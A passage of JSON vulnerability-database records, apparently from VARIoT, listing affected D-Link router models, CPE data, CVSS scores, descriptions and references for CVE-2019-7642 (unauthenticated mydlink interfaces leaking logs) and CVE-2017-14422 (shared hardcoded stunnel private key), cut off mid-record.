        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.06"
      },
      {
        "model": "dir-817lw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04"
      },
      {
        "model": "dir-816",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-816l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-817lw",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-868l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-817lw a1-1.04",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-817lw_firmware:1.04:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-817lw:a1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-816l:b1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-816_firmware:2.06:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-816:b1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:1.09:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:a1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-868l_firmware:1.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-868l:a1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      }
    ]
  },
  "cve": "CVE-2019-7642",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-7642",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2019-23343",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-159077",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-7642",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-7642",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-23343",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201903-926",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-159077",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-7642",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-7642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users\u0027 DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10). plural D-Link The product contains authentication vulnerabilities.Information may be obtained. D-Link is a company specializing in the design and development of computer network equipment. D-LinkDIR-817LW is a wireless router from D-Link of Taiwan, China. An information disclosure vulnerability exists in the D-Link router. D-Link DIR-817LW, etc. The following products are affected: D-Link DIR-817LW (A1-1.04); DIR-816L (B1-2.06); DIR-816 (B1-2.06); DIR-850L (A1-1.09); 1.10)",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-7642"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-7642",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201903-926",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-159077",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-7642",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-7642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ]
  },
  "id": "VAR-201903-0482",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-159077"
      }
    ],
    "trust": 1.1576200966666665
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:43:36.844000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.dlink.lt/en/"
      },
      {
        "title": "CVE-2019-7642",
        "trust": 0.1,
        "url": "https://github.com/xw77cve/cve "
      },
      {
        "title": "CVE-2019-7642",
        "trust": 0.1,
        "url": "https://github.com/xw77cve/cve-2019-7642 "
      },
      {
        "title": "PoC",
        "trust": 0.1,
        "url": "https://github.com/jonathan-elias/poc "
      },
      {
        "title": "CVE-POC",
        "trust": 0.1,
        "url": "https://github.com/0xt11/cve-poc "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/nomi-sec/poc-in-github "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/hectorgie/poc-in-github "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-7642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-306",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-287",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://github.com/xw77cve/cve-2019-7642/blob/master/readme.md"
      },
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7642"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7642"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/306.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/xw77cve/cve"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/nomi-sec/poc-in-github"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-7642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-7642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-7642"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-07-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "date": "2019-03-25T00:00:00",
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "date": "2019-03-25T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-7642"
      },
      {
        "date": "2019-05-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "date": "2019-03-25T22:29:00.810000",
        "db": "NVD",
        "id": "CVE-2019-7642"
      },
      {
        "date": "2019-03-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-07-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-23343"
      },
      {
        "date": "2020-08-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-159077"
      },
      {
        "date": "2021-04-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-7642"
      },
      {
        "date": "2019-05-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      },
      {
        "date": "2021-04-23T15:45:24.947000",
        "db": "NVD",
        "id": "CVE-2019-7642"
      },
      {
        "date": "2021-04-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  D-Link Authentication vulnerabilities in products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003086"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "access control error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201903-926"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0593

Vulnerability from variot - Updated: 2023-12-18 12:29

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices use the same hardcoded /etc/stunnel.key private key across different customers' installations, which allows remote attackers to defeat the HTTPS cryptographic protection mechanisms by leveraging knowledge of this key from another installation. D-Link DIR-850L device firmware contains a vulnerability related to the use of hard-coded credentials. Information may be obtained. D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. The vulnerability arises because every installation ships with the same hard-coded private key (/etc/stunnel.key) rather than a key unique to each device. A remote attacker could exploit this vulnerability to compromise the HTTPS encryption protection mechanism.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0593",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      }
    ]
  },
  "cve": "CVE-2017-14422",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14422",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-31787",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-105143",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14422",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14422",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31787",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-573",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105143",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
